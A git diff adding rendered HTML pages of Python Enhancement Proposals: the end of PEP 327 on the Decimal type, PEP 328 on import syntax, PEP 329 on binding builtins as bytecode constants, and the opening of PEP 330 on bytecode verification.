(the) Context applies only to operations, not to Decimal +instances; changing the Context does not affect existing instances +if there are no operations on them.
+

Arguing about special cases, when there’s a need to perform operations with rules other than those of the current context, Tim Peters said that the context will have the operations as methods. This way, the user “can create whatever private context object(s) it needs, and spell arithmetic as explicit method calls on its private context object(s), so that the default thread context object is neither consulted nor modified”.
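A short sketch of that pattern (using the Context class as released; the private context governs the method call, while the thread context is neither consulted nor modified):

>>> from decimal import Decimal, Context, getcontext
>>> mycontext = Context(prec=5)
>>> mycontext.multiply(Decimal('1.2345678'), 10)
Decimal('12.346')
>>> getcontext().prec   # the thread context is untouched
28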

+
+
+

Python Usability

+
    +
  • Decimal should support the basic arithmetic (+, -, *, /, //, **, %, divmod) and comparison (==, !=, <, >, <=, >=, cmp) operators in the following cases (check Implicit Construction to see what types otherType could be, and what happens in each case):
      +
    • Decimal op Decimal
    • +
    • Decimal op otherType
    • +
    • otherType op Decimal
    • +
    • Decimal op= Decimal
    • +
    • Decimal op= otherType
    • +
    +
  • +
  • Decimal should support unary operators (-, +, abs).
  • +
  • repr() should round trip, meaning that:
    m = Decimal(...)
    +m == eval(repr(m))
    +
    +
    +
  • +
  • Decimal should be immutable.
  • +
  • Decimal should support the built-in methods:
      +
    • min, max
    • +
    • float, int, long
    • +
    • str, repr
    • +
    • hash
    • +
    • bool (0 is false, otherwise true)
    • +
    +
  • +
+

There’s been some discussion in python-dev about the behaviour of +hash(). The community agrees that if the values are the same, the +hashes of those values should also be the same. So, while Decimal(25) +== 25 is True, hash(Decimal(25)) should be equal to hash(25).

+

The detail is that you can NOT compare Decimal to floats or strings, +so we should not worry about them giving the same hashes. In short:

+
hash(n) == hash(Decimal(n))   # Only if n is int, long, or Decimal
+
+
+
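Concretely (as the released decimal module behaves):

>>> from decimal import Decimal
>>> hash(Decimal(25)) == hash(25)
True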

Regarding str() and repr() behaviour, Ka-Ping Yee proposes that repr() +have the same behaviour as str() and Tim Peters proposes that str() +behave like the to-scientific-string operation from the Spec.

+

This is possible, because (from Aahz): “The string form already +contains all the necessary information to reconstruct a Decimal +object”.

+

And it also complies with the Spec; Tim Peters:

+
+
There’s no requirement to have a method named “to_sci_string”, +the only requirement is that some way to spell to-sci-string’s +functionality be supplied. The meaning of to-sci-string is +precisely specified by the standard, and is a good choice for both +str(Decimal) and repr(Decimal).
+
+
+
+

Documentation

+

This section explains all the public methods and attributes of Decimal +and Context.

+
+

Decimal Attributes

+

Decimal has no public attributes. The internal information is stored +in slots and should not be accessed by end users.

+
+
+

Decimal Methods

+

Following are the conversion and arithmetic operations defined in the Spec, and how that functionality can be achieved with the current implementation.

+
    +
  • to-scientific-string: Use builtin function str():
    >>> d = Decimal('123456789012.345')
    +>>> str(d)
    +'1.23456789E+11'
    +
    +
    +
  • +
  • to-engineering-string: Use method to_eng_string():
    >>> d = Decimal('123456789012.345')
    +>>> d.to_eng_string()
    +'123.456789E+9'
    +
    +
    +
  • +
  • to-number: Use Context method create_decimal(). The standard +constructor or from_float() constructor cannot be used because +these do not use the context (as is specified in the Spec for this +conversion).
  • +
  • abs: Use builtin function abs():
    >>> d = Decimal('-15.67')
    +>>> abs(d)
    +Decimal('15.67')
    +
    +
    +
  • +
  • add: Use operator +:
    >>> d = Decimal('15.6')
    +>>> d + 8
    +Decimal('23.6')
    +
    +
    +
  • +
  • subtract: Use operator -:
    >>> d = Decimal('15.6')
    +>>> d - 8
    +Decimal('7.6')
    +
    +
    +
  • +
  • compare: Use method compare(). This method (and not the +built-in function cmp()) should only be used when dealing with +special values:
    >>> d = Decimal('-15.67')
    +>>> nan = Decimal('NaN')
    +>>> d.compare(23)
+Decimal('-1')
    +>>> d.compare(nan)
+Decimal('NaN')
    +>>> cmp(d, 23)
    +-1
    +>>> cmp(d, nan)
    +1
    +
    +
    +
  • +
  • divide: Use operator /:
    >>> d = Decimal('-15.67')
    +>>> d / 2
    +Decimal('-7.835')
    +
    +
    +
  • +
  • divide-integer: Use operator //:
    >>> d = Decimal('-15.67')
    +>>> d // 2
    +Decimal('-7')
    +
    +
    +
  • +
  • max: Use method max(). Only use this method (and not the +built-in function max()) when dealing with special values:
    >>> d = Decimal('15')
    +>>> nan = Decimal('NaN')
    +>>> d.max(8)
    +Decimal('15')
    +>>> d.max(nan)
    +Decimal('NaN')
    +
    +
    +
  • +
  • min: Use method min(). Only use this method (and not the +built-in function min()) when dealing with special values:
    >>> d = Decimal('15')
    +>>> nan = Decimal('NaN')
    +>>> d.min(8)
    +Decimal('8')
    +>>> d.min(nan)
    +Decimal('NaN')
    +
    +
    +
  • +
  • minus: Use unary operator -:
    >>> d = Decimal('-15.67')
    +>>> -d
    +Decimal('15.67')
    +
    +
    +
  • +
  • plus: Use unary operator +:
    >>> d = Decimal('-15.67')
    +>>> +d
    +Decimal('-15.67')
    +
    +
    +
  • +
  • multiply: Use operator *:
    >>> d = Decimal('5.7')
    +>>> d * 3
    +Decimal('17.1')
    +
    +
    +
  • +
  • normalize: Use method normalize():
    >>> d = Decimal('123.45000')
    +>>> d.normalize()
    +Decimal('123.45')
    +>>> d = Decimal('120.00')
    +>>> d.normalize()
    +Decimal('1.2E+2')
    +
    +
    +
  • +
  • quantize: Use method quantize():
    >>> d = Decimal('2.17')
    +>>> d.quantize(Decimal('0.001'))
    +Decimal('2.170')
    +>>> d.quantize(Decimal('0.1'))
    +Decimal('2.2')
    +
    +
    +
  • +
  • remainder: Use operator %:
    >>> d = Decimal('10')
    +>>> d % 3
    +Decimal('1')
    +>>> d % 6
    +Decimal('4')
    +
    +
    +
  • +
  • remainder-near: Use method remainder_near():
    >>> d = Decimal('10')
    +>>> d.remainder_near(3)
    +Decimal('1')
    +>>> d.remainder_near(6)
    +Decimal('-2')
    +
    +
    +
  • +
  • round-to-integral-value: Use method to_integral():
    >>> d = Decimal('-123.456')
    +>>> d.to_integral()
    +Decimal('-123')
    +
    +
    +
  • +
  • same-quantum: Use method same_quantum():
    >>> d = Decimal('123.456')
    +>>> d.same_quantum(Decimal('0.001'))
    +True
    +>>> d.same_quantum(Decimal('0.01'))
    +False
    +
    +
    +
  • +
  • square-root: Use method sqrt():
    >>> d = Decimal('123.456')
    +>>> d.sqrt()
    +Decimal('11.1110756')
    +
    +
    +
  • +
  • power: Use operator **:
    >>> d = Decimal('12.56')
    +>>> d ** 2
    +Decimal('157.7536')
    +
    +
    +
  • +
+

Following are other methods and why they exist:

+
    +
  • adjusted(): Returns the adjusted exponent. This concept is +defined in the Spec: the adjusted exponent is the value of the +exponent of a number when that number is expressed as though in +scientific notation with one digit before any decimal point:
    >>> d = Decimal('12.56')
    +>>> d.adjusted()
    +1
    +
    +
    +
  • +
  • from_float(): Class method to create instances from float data +types:
    >>> d = Decimal.from_float(12.35)
    +>>> d
    +Decimal('12.3500000')
    +
    +
    +
  • +
  • as_tuple(): Show the internal structure of the Decimal: the (sign, digits, exponent) triple. This method is not required by the Spec, but Tim Peters proposed it and the community agreed to have it (it’s useful for developing and debugging):
    >>> d = Decimal('123.4')
    +>>> d.as_tuple()
    +(0, (1, 2, 3, 4), -1)
    +>>> d = Decimal('-2.34e5')
    +>>> d.as_tuple()
    +(1, (2, 3, 4), 3)
    +
    +
    +
  • +
+
+
+

Context Attributes

+

These are the attributes that can be changed to modify the context.

+
    +
  • prec (int): the precision:
    >>> c.prec
    +9
    +
    +
    +
  • +
  • rounding (str): rounding type (how to round):
    >>> c.rounding
    +'half_even'
    +
    +
    +
  • +
  • trap_enablers (dict): if trap_enablers[exception] is set to 1, then an exception is raised when the corresponding condition occurs:
    >>> c.trap_enablers[Underflow]
    +0
    +>>> c.trap_enablers[Clamped]
    +0
    +
    +
    +
  • +
  • flags (dict): when an exception is caused, flags[exception] is incremented (whether or not the trap_enabler is set). It should be reset by the user of the Decimal instance:
    >>> c.flags[Underflow]
    +0
    +>>> c.flags[Clamped]
    +0
    +
    +
    +
  • +
  • Emin (int): minimum exponent:
    >>> c.Emin
    +-999999999
    +
    +
    +
  • +
  • Emax (int): maximum exponent:
    >>> c.Emax
    +999999999
    +
    +
    +
  • +
  • capitals (int): boolean flag to use ‘E’ (True/1) or ‘e’ +(False/0) in the string (for example, ‘1.32e+2’ or ‘1.32E+2’):
    >>> c.capitals
    +1
    +
    +
    +
  • +
+
+
+

Context Methods

+

The following methods comply with Decimal functionality from the Spec. +Be aware that the operations that are called through a specific +context use that context and not the thread context.

+

To use these methods, take note that the syntax changes when the +operator is binary or unary, for example:

+
>>> mycontext.abs(Decimal('-2'))
+Decimal('2')
+>>> mycontext.multiply(Decimal('2.3'), 5)
+Decimal('11.5')
+
+
+

So, the following are the Spec operations and conversions and how to +achieve them through a context (where d is a Decimal instance and +n a number that can be used in an Implicit construction):

+
    +
  • to-scientific-string: to_sci_string(d)
  • +
  • to-engineering-string: to_eng_string(d)
  • +
  • to-number: create_decimal(number), see Explicit construction +for number.
  • +
  • abs: abs(d)
  • +
  • add: add(d, n)
  • +
  • subtract: subtract(d, n)
  • +
  • compare: compare(d, n)
  • +
  • divide: divide(d, n)
  • +
  • divide-integer: divide_int(d, n)
  • +
  • max: max(d, n)
  • +
  • min: min(d, n)
  • +
  • minus: minus(d)
  • +
  • plus: plus(d)
  • +
  • multiply: multiply(d, n)
  • +
  • normalize: normalize(d)
  • +
  • quantize: quantize(d, d)
  • +
  • remainder: remainder(d, n)
  • +
  • remainder-near: remainder_near(d, n)
  • +
  • round-to-integral-value: to_integral(d)
  • +
  • same-quantum: same_quantum(d, d)
  • +
  • square-root: sqrt(d)
  • +
  • power: power(d, n)
  • +
+

The divmod(d, n) functionality is likewise supported through a Context method.

+

These are methods that return useful information from the Context:

+
    +
  • Etiny(): Minimum exponent considering precision.
    >>> c.Emin
    +-999999999
    +>>> c.Etiny()
    +-1000000007
    +
    +
    +
  • +
  • Etop(): Maximum exponent considering precision.
    >>> c.Emax
    +999999999
    +>>> c.Etop()
    +999999991
    +
    +
    +
  • +
  • copy(): Returns a copy of the context.
  • +
+
+
+
+

Reference Implementation

+

As of Python 2.4-alpha, the code has been checked into the standard +library. The latest version is available from:

+

http://svn.python.org/view/python/trunk/Lib/decimal.py

+

The test cases are here:

+

http://svn.python.org/view/python/trunk/Lib/test/test_decimal.py

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0327.rst

+


+ +
+ +
+ \ No newline at end of file diff --git a/pep-0328/index.html b/pep-0328/index.html new file mode 100644 index 00000000000..e3f30aed8c4 --- /dev/null +++ b/pep-0328/index.html @@ -0,0 +1,423 @@ + PEP 328 – Imports: Multi-Line and Absolute/Relative | peps.python.org
+
+


+ + +
+
+
+

PEP 328 – Imports: Multi-Line and Absolute/Relative

+
+
Author:
+
Aahz <aahz at pythoncraft.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
21-Dec-2003
+
Python-Version:
+
2.4, 2.5, 2.6
+
Post-History:
+
08-Mar-2004
+
+
+
+
+
+

Abstract

+

The import statement has two problems:

+
    +
  • Long import statements can be difficult to write, requiring +various contortions to fit Pythonic style guidelines.
  • +
  • Imports can be ambiguous in the face of packages; within a package, +it’s not clear whether import foo refers to a module within the +package or some module outside the package. (More precisely, a local +module or package can shadow another hanging directly off +sys.path.)
  • +
+

For the first problem, it is proposed that parentheses be permitted to +enclose multiple names, thus allowing Python’s standard mechanisms for +multi-line values to apply. For the second problem, it is proposed that +all import statements be absolute by default (searching sys.path +only) with special syntax (leading dots) for accessing package-relative +imports.

+
+
+

Timeline

+

In Python 2.5, you must enable the new absolute import behavior with

+
from __future__ import absolute_import
+
+
+

You may use relative imports freely. In Python 2.6, any import +statement that results in an intra-package import will raise +DeprecationWarning (this also applies to from <> import that +fails to use the relative import syntax).

+
+
+

Rationale for Parentheses

+

Currently, if you want to import a lot of names from a module or +package, you have to choose one of several unpalatable options:

+
    +
  • Write a long line with backslash continuations:
    from Tkinter import Tk, Frame, Button, Entry, Canvas, Text, \
    +    LEFT, DISABLED, NORMAL, RIDGE, END
    +
    +
    +
  • +
  • Write multiple import statements:
    from Tkinter import Tk, Frame, Button, Entry, Canvas, Text
    +from Tkinter import LEFT, DISABLED, NORMAL, RIDGE, END
    +
    +
    +
  • +
+

(import * is not an option ;-)

+

Instead, it should be possible to use Python’s standard grouping +mechanism (parentheses) to write the import statement:

+
from Tkinter import (Tk, Frame, Button, Entry, Canvas, Text,
+    LEFT, DISABLED, NORMAL, RIDGE, END)
+
+
+

This part of the proposal had BDFL approval from the beginning.

+

Parentheses support was added to Python 2.4.

+
+
+

Rationale for Absolute Imports

+

In Python 2.4 and earlier, if you’re reading a module located inside a +package, it is not clear whether

+
import foo
+
+
+

refers to a top-level module or to another module inside the package. +As Python’s library expands, more and more existing package internal +modules suddenly shadow standard library modules by accident. It’s a +particularly difficult problem inside packages because there’s no way to +specify which module is meant. To resolve the ambiguity, it is proposed +that foo will always be a module or package reachable from +sys.path. This is called an absolute import.

+

The python-dev community chose absolute imports as the default because +they’re the more common use case and because absolute imports can provide +all the functionality of relative (intra-package) imports – albeit at +the cost of difficulty when renaming package pieces higher up in the +hierarchy or when moving one package inside another.

+

Because this represents a change in semantics, absolute imports will +be optional in Python 2.5 and 2.6 through the use of

+
from __future__ import absolute_import
+
+
+

This part of the proposal had BDFL approval from the beginning.

+
+
+

Rationale for Relative Imports

+

With the shift to absolute imports, the question arose whether +relative imports should be allowed at all. Several use cases were +presented, the most important of which is being able to rearrange the +structure of large packages without having to edit sub-packages. In +addition, a module inside a package can’t easily import itself without +relative imports.

+

Guido approved of the idea of relative imports, but there has been a +lot of disagreement on the spelling (syntax). There does seem to be +agreement that relative imports will require listing specific names to +import (that is, import foo as a bare term will always be an +absolute import).

+

Here are the contenders:

+
    +
  • One from Guido:
    from .foo import bar
    +
    +
    +

    and

    +
    from ...foo import bar
    +
    +
    +

    These two forms have a couple of different suggested semantics. One +semantic is to make each dot represent one level. There have been +many complaints about the difficulty of counting dots. Another +option is to only allow one level of relative import. That misses a +lot of functionality, and people still complained about missing the +dot in the one-dot form. The final option is to define an algorithm +for finding relative modules and packages; the objection here is +“Explicit is better than implicit”. (The algorithm proposed is +“search up from current package directory until the ultimate package +parent gets hit”.)

    +

    Some people have suggested other punctuation as the separator, such +as “-” or “^”.

    +

    Some people have suggested using “*”:

    +
    from *.foo import bar
    +
    +
    +
  • +
  • The next set of options is conflated from several posters:
    from __pkg__.__pkg__ import
    +
    +
    +

    and

    +
    from .__parent__.__parent__ import
    +
    +
    +

    Many people (Guido included) think these look ugly, but they are +clear and explicit. Overall, more people prefer __pkg__ as the +shorter option.

    +
  • +
  • One suggestion was to allow only sibling references. In other words, +you would not be able to use relative imports to refer to modules +higher in the package tree. You would then be able to do either
    from .spam import eggs
    +
    +
    +

    or

    +
    import .spam.eggs
    +
    +
    +
  • +
  • Some people favor allowing indexed parents:
    from -2.spam import eggs
    +
    +
    +

    In this scenario, importing from the current directory would be a +simple

    +
    from .spam import eggs
    +
    +
    +
  • +
  • Finally, some people dislike the way you have to change import +to from ... import when you want to dig inside a package. They +suggest completely rewriting the import syntax:
    from MODULE import NAMES as RENAME searching HOW
    +
    +
    +

    or

    +
    import NAMES as RENAME from MODULE searching HOW
    +    [from NAMES] [in WHERE] import ...
    +
    +
    +

    However, this most likely could not be implemented for Python 2.5 +(too big a change), and allowing relative imports is sufficiently +critical that we need something now (given that the standard +import will change to absolute import). More than that, this +proposed syntax has several open questions:

    +
      +
    • What is the precise proposed syntax? (Which clauses are optional +under which circumstances?)
    • +
    • How strongly does the searching clause bind? In other words, +do you write:
      import foo as bar searching XXX, spam as ham searching XXX
      +
      +
      +

      or:

      +
      import foo as bar, spam as ham searching XXX
      +
      +
      +
    • +
    +
  • +
+
+
+

Guido’s Decision

+

Guido has Pronounced [1] that relative imports will use leading dots. +A single leading dot indicates a relative import, starting with the +current package. Two or more leading dots give a relative import to the +parent(s) of the current package, one level per dot after the first. +Here’s a sample package layout:

+
package/
+    __init__.py
+    subpackage1/
+        __init__.py
+        moduleX.py
+        moduleY.py
+    subpackage2/
+        __init__.py
+        moduleZ.py
+    moduleA.py
+
+
+

Assuming that the current file is either moduleX.py or +subpackage1/__init__.py, following are correct usages of the new +syntax:

+
from .moduleY import spam
+from .moduleY import spam as ham
+from . import moduleY
+from ..subpackage1 import moduleY
+from ..subpackage2.moduleZ import eggs
+from ..moduleA import foo
+from ...package import bar
+from ...sys import path
+
+
+

Note that while that last case is legal, it is certainly discouraged +(“insane” was the word Guido used).

+

Relative imports must always use from <> import; import <> is +always absolute. Of course, absolute imports can use from <> import +by omitting the leading dots. The reason import .foo is prohibited +is because after

+
import XXX.YYY.ZZZ
+
+
+

then

+
XXX.YYY.ZZZ
+
+
+

is usable in an expression. But

+
.moduleY
+
+
+

is not usable in an expression.

+
+
+

Relative Imports and __name__

+

Relative imports use a module’s __name__ attribute to determine that +module’s position in the package hierarchy. If the module’s name does +not contain any package information (e.g. it is set to ‘__main__’) +then relative imports are resolved as if the module were a top level +module, regardless of where the module is actually located on the file +system.
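As an illustration, consider the sample package layout from Guido’s Decision above (a sketch; the error text shown is Python 2’s wording):

# package/subpackage1/moduleX.py
from .moduleY import spam    # fine when imported as package.subpackage1.moduleX

Running the same file directly sets __name__ to '__main__', so the module is treated as a top level module and the relative import fails:

$ python package/subpackage1/moduleX.py
ValueError: Attempted relative import in non-package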

+
+
+

Relative Imports and Indirection Entries in sys.modules

+

When packages were introduced, the concept of an indirection entry in +sys.modules came into existence [2]. When an entry in sys.modules +for a module within a package had a value of None, it represented that +the module actually referenced the top-level module. For instance, +‘Sound.Effects.string’ might have a value of None in sys.modules. +That meant any import that resolved to that name actually was to +import the top-level ‘string’ module.

+

This introduced an optimization for when a relative import was meant +to resolve to an absolute import. But since this PEP makes a very +clear delineation between absolute and relative imports, this +optimization is no longer needed. When absolute/relative imports +become the only import semantics available then indirection entries in +sys.modules will no longer be supported.

+
+
+

References

+

For more background, see the following python-dev threads:

+ + +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0328.rst

+


+ +
+ +
+ \ No newline at end of file diff --git a/pep-0329/index.html b/pep-0329/index.html new file mode 100644 index 00000000000..a3c1558f71c --- /dev/null +++ b/pep-0329/index.html @@ -0,0 +1,358 @@ + PEP 329 – Treating Builtins as Constants in the Standard Library | peps.python.org
+
+


+ + +
+
+
+

PEP 329 – Treating Builtins as Constants in the Standard Library

+
+
Author:
+
Raymond Hettinger <python at rcn.com>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
18-Apr-2004
+
Python-Version:
+
2.4
+
Post-History:
+
18-Apr-2004
+
+
+
+
+
+

Abstract

+

The proposal is to add a function for treating builtin references as +constants and to apply that function throughout the standard library.

+
+
+

Status

+

The PEP is self-rejected by the author. Though the ASPN recipe was well received, there was less willingness to consider this for inclusion in the core distribution.

+

The Jython implementation does not use byte codes, so its performance +would suffer if the current _len=len optimizations were removed.

+

Also, altering byte codes is one of the least clean ways to improve +performance and enable cleaner coding. A more robust solution would +likely involve compiler pragma directives or metavariables indicating +what can be optimized (similar to const/volatile declarations).

+
+
+

Motivation

+

The library contains code such as _len=len which is intended to +create fast local references instead of slower global lookups. Though +necessary for performance, these constructs clutter the code and are +usually incomplete (missing many opportunities).
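For reference, the idiom being discussed binds the builtin to a default argument at function-definition time, so that calls avoid the global-then-builtin lookup chain (a generic sketch, not an excerpt from any particular stdlib module):

def all_lengths(items, _len=len):
    # _len was bound once, at def-time; a plain len would be looked up
    # in globals and then builtins on every call
    return [_len(item) for item in items]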

+

If the proposal is adopted, those constructs could be eliminated from +the code base and at the same time improve upon their results in terms +of performance.

+

There are currently over a hundred instances of while 1 in the +library. They were not replaced with the more readable while True +because of performance reasons (the compiler cannot eliminate the test +because True is not known to always be a constant). Conversion of +True to a constant will clarify the code while retaining performance.

+

Many other basic Python operations run much slower because of global +lookups. In try/except statements, the trapped exceptions are +dynamically looked up before testing whether they match. +Similarly, simple identity tests such as while x is not None +require the None variable to be re-looked up on every pass. +Builtin lookups are especially egregious because the enclosing global +scope must be checked first. These lookup chains devour cache space +that is best used elsewhere.

+

In short, if the proposal is adopted, the code will become cleaner +and performance will improve across the board.

+
+
+

Proposal

+

Add a module called codetweaks.py which contains two functions, +bind_constants() and bind_all(). The first function performs +constant binding and the second recursively applies it to every +function and class in a target module.

+

For most modules in the standard library, add a pair of lines near +the end of the script:

+
import codetweaks, sys
+codetweaks.bind_all(sys.modules[__name__])
+
+
+

In addition to binding builtins, there are some modules (like +sre_compile) where it also makes sense to bind module variables +as well as builtins into constants.

+
+
+

Questions and Answers

+
    +
  1. Will this make everyone divert their attention to optimization +issues?

    Because it is done automatically, it reduces the need to think +about optimizations.

    +
  2. +
  3. In a nutshell, how does it work?

    Every function has attributes with its bytecodes (the language of the Python virtual machine) and a table of constants. The bind function scans the bytecodes for LOAD_GLOBAL instructions and checks to see whether the value is already known. If so, it adds that value to the constants table and replaces the opcode with LOAD_CONST.

    +
  4. +
  5. When does it work?

    When a module is imported for the first time, Python compiles the bytecode and runs the binding optimization. Subsequent imports just re-use the previous work. Each session repeats this process (the results are not saved in pyc files).

    +
  6. +
  7. How do you know this works?

    I implemented it, applied it to every module in the library, and the test suite ran without exception.

    +
  8. +
  9. What if the module defines a variable shadowing a builtin?

    This does happen. For instance, True can be redefined at the module +level as True = (1==1). The sample implementation below detects the +shadowing and leaves the global lookup unchanged.

    +
  10. +
  11. Are you the first person to recognize that most global lookups are for +values that never change?

    No, this has long been known. Skip Montanaro provides an eloquent +explanation in PEP 266.

    +
  12. +
  13. What if I want to replace the builtins module and supply my own +implementations?

    Either do this before importing a module, or just reload the +module, or disable codetweaks.py (it will have a disable flag).

    +
  14. +
  15. How susceptible is this module to changes in Python’s byte coding?

    It imports opcode.py to protect against renumbering. Also, it +uses LOAD_CONST and LOAD_GLOBAL which are fundamental and have +been around forever. That notwithstanding, the coding scheme could +change and this implementation would have to change along with +modules like dis which also rely on the current coding scheme.

    +
  16. +
  17. What is the effect on startup time?

    I could not measure a difference. None of the startup modules are +bound except for warnings.py. Also, the binding function is very +fast, making just a single pass over the code string in search of +the LOAD_GLOBAL opcode.

    +
  18. +
+
+
+

Sample Implementation

+

Here is a sample implementation for codetweaks.py:

+
from types import ClassType, FunctionType
+from opcode import opmap, HAVE_ARGUMENT, EXTENDED_ARG
+LOAD_GLOBAL, LOAD_CONST = opmap['LOAD_GLOBAL'], opmap['LOAD_CONST']
+ABORT_CODES = (EXTENDED_ARG, opmap['STORE_GLOBAL'])
+
+def bind_constants(f, builtin_only=False, stoplist=[], verbose=False):
+    """ Return a new function with optimized global references.
+
+    Replaces global references with their currently defined values.
+    If not defined, the dynamic (runtime) global lookup is left undisturbed.
+    If builtin_only is True, then only builtins are optimized.
+    Variable names in the stoplist are also left undisturbed.
+    If verbose is True, prints each substitution as it occurs.
+
+    """
+    import __builtin__
+    env = vars(__builtin__).copy()
+    stoplist = dict.fromkeys(stoplist)
+    if builtin_only:
+        stoplist.update(f.func_globals)
+    else:
+        env.update(f.func_globals)
+
+    co = f.func_code
+    newcode = map(ord, co.co_code)
+    newconsts = list(co.co_consts)
+    codelen = len(newcode)
+
+    i = 0
+    while i < codelen:
+        opcode = newcode[i]
+        if opcode in ABORT_CODES:
+            return f    # for simplicity, only optimize common cases
+        if opcode == LOAD_GLOBAL:
+            oparg = newcode[i+1] + (newcode[i+2] << 8)
+            name = co.co_names[oparg]
+            if name in env and name not in stoplist:
+                value = env[name]
+                try:
+                    pos = newconsts.index(value)
+                except ValueError:
+                    pos = len(newconsts)
+                    newconsts.append(value)
+                newcode[i] = LOAD_CONST
+                newcode[i+1] = pos & 0xFF
+                newcode[i+2] = pos >> 8
+                if verbose:
+                    print name, '-->', value
+        i += 1
+        if opcode >= HAVE_ARGUMENT:
+            i += 2
+
+    codestr = ''.join(map(chr, newcode))
+    codeobj = type(co)(co.co_argcount, co.co_nlocals, co.co_stacksize,
+                    co.co_flags, codestr, tuple(newconsts), co.co_names,
+                    co.co_varnames, co.co_filename, co.co_name,
+                    co.co_firstlineno, co.co_lnotab, co.co_freevars,
+                    co.co_cellvars)
+    return type(f)(codeobj, f.func_globals, f.func_name, f.func_defaults,
+                    f.func_closure)
+
+
+def bind_all(mc, builtin_only=False, stoplist=[], verbose=False):
+    """Recursively apply bind_constants() to functions in a module or class.
+
+    Use as the last line of the module (after everything is defined, but
+    before test code).
+
+    In modules that need modifiable globals, set builtin_only to True.
+
+    """
+    for k, v in vars(mc).items():
+        if type(v) is FunctionType:
+            newv = bind_constants(v, builtin_only, stoplist, verbose)
+            setattr(mc, k, newv)
+        elif type(v) in (type, ClassType):
+            bind_all(v, builtin_only, stoplist, verbose)
+
+
+def f(): pass
+try:
+    f.func_code.co_code
+except AttributeError:                  # detect non-CPython environments
+    bind_all = lambda *args, **kwds: 0
+del f
+
+import sys
+bind_all(sys.modules[__name__])         # Optimizer, optimize thyself!
+
+
+

Note the automatic detection of a non-CPython environment that does not +have bytecodes [2]. In that situation, the bind functions would simply +return the original function unchanged. This assures that the two +line additions to library modules do not impact other implementations.

+

The final code should add a flag to make it easy to disable binding.

+
+
+

References

+

[1] ASPN Recipe for a non-private implementation + https://code.activestate.com/recipes/277940/

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0329.rst

+


+ +
+ +
+ \ No newline at end of file diff --git a/pep-0330/index.html b/pep-0330/index.html new file mode 100644 index 00000000000..c17e9498cdd --- /dev/null +++ b/pep-0330/index.html @@ -0,0 +1,325 @@ + PEP 330 – Python Bytecode Verification | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 330 – Python Bytecode Verification

+
+
Author:
+
Michel Pelletier <michel at users.sourceforge.net>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
17-Jun-2004
+
Python-Version:
+
2.6
+
Post-History:
+

+
+
+
+
+
+

Abstract

+

If Python Virtual Machine (PVM) bytecode is not “well-formed” it +is possible to crash or exploit the PVM by causing various errors +such as under/overflowing the value stack or reading/writing into +arbitrary areas of the PVM program space. Most of these kinds of +errors can be eliminated by verifying that PVM bytecode does not +violate a set of simple constraints before execution.

+

This PEP proposes a set of constraints on the format and structure +of Python Virtual Machine (PVM) bytecode and provides an +implementation in Python of this verification process.

+
+
+

Pronouncement

+

Guido believes that a verification tool has some value. If +someone wants to add it to Tools/scripts, no PEP is required.

+

Such a tool may have value for validating the output from +“bytecodehacks” or from direct edits of PYC files. As security +measure, its value is somewhat limited because perfectly valid +bytecode can still do horrible things. That situation could +change if the concept of restricted execution were to be +successfully resurrected.

+
+
+

Motivation

+

The Python Virtual Machine executes Python programs that have been compiled from the Python language into a bytecode representation. The PVM assumes that any bytecode being executed is “well-formed” with regard to a number of implicit constraints. Some of these constraints are checked at run-time, but most of them are not, due to the overhead they would create.

+

When running in debug mode, the PVM does perform several run-time checks to ensure that any particular bytecode cannot violate these constraints; to a degree, these checks prevent bytecode from crashing or exploiting the interpreter. They add a measurable overhead to the interpreter, and are typically turned off in common use.

+

Bytecode that is not well-formed and executed by a PVM not running +in debug mode may create a variety of fatal and non-fatal errors. +Typically, ill-formed code will cause the PVM to seg-fault and +cause the OS to immediately and abruptly terminate the +interpreter.

+

Conceivably, ill-formed bytecode could exploit the interpreter and +allow Python bytecode to execute arbitrary C-level machine +instructions or to modify private, internal data structures in the +interpreter. If used cleverly this could subvert any form of +security policy an application may want to apply to its objects.

+

Practically, it would be difficult for a malicious user to +“inject” invalid bytecode into a PVM for the purposes of +exploitation, but not impossible. Buffer overflow and memory +overwrite attacks are commonly understood, particularly when the +exploit payload is transmitted unencrypted over a network or when +a file or network security permission weakness is used as a +foothold for further attacks.

+

Ideally, no bytecode should ever be allowed to read or write +underlying C-level data structures to subvert the operation of the +PVM, whether the bytecode was maliciously crafted or not. A +simple pre-execution verification step could ensure that bytecode +cannot over/underflow the value stack or access other sensitive +areas of PVM program space at run-time.

+

This PEP proposes several validation steps that should be taken on Python bytecode before it is executed by the PVM, so that it complies with static and structural constraints on its instructions and their operands. These steps are simple and catch a large class of invalid bytecode that can cause crashes. There is also some possibility that some run-time checks can be eliminated up front by a verification pass.

+

There is, of course, no way to verify that bytecode is “completely +safe”, for every definition of complete and safe. Even with +bytecode verification, Python programs can and most likely in the +future will seg-fault for a variety of reasons and continue to +cause many different classes of run-time errors, fatal or not. +The verification step proposed here simply plugs an easy hole that +can cause a large class of fatal and subtle errors at the bytecode +level.

+

Currently, the Java Virtual Machine (JVM) verifies Java bytecode +in a way very similar to what is proposed here. The JVM +Specification version 2 [1], Sections 4.8 and 4.9 were therefore +used as a basis for some of the constraints explained below. Any +Python bytecode verification implementation at a minimum must +enforce these constraints, but may not be limited to them.

+
+
+

Static Constraints on Bytecode Instructions

+
    +
  1. The bytecode string must not be empty. (len(co_code) > 0).
  2. +
  3. The bytecode string cannot exceed a maximum size +(len(co_code) < sizeof(unsigned char) - 1).
  4. +
  5. The first instruction in the bytecode string begins at index 0.
  6. +
  7. Only valid byte-codes with the correct number of operands can +be in the bytecode string.
  8. +
+
+
+

Static Constraints on Bytecode Instruction Operands

+
    +
  1. The target of a jump instruction must be within the code +boundaries and must fall on an instruction, never between an +instruction and its operands.
  2. +
  3. The operand of a LOAD_* instruction must be a valid index into +its corresponding data structure.
  4. +
  5. The operand of a STORE_* instruction must be a valid index +into its corresponding data structure.
  6. +
+
+
+

Structural Constraints between Bytecode Instructions

+
    +
  1. Each instruction must only be executed with the appropriate +number of arguments in the value stack, regardless of the +execution path that leads to its invocation.
  2. +
  3. If an instruction can be executed along several different +execution paths, the value stack must have the same depth prior +to the execution of the instruction, regardless of the path +taken.
  4. +
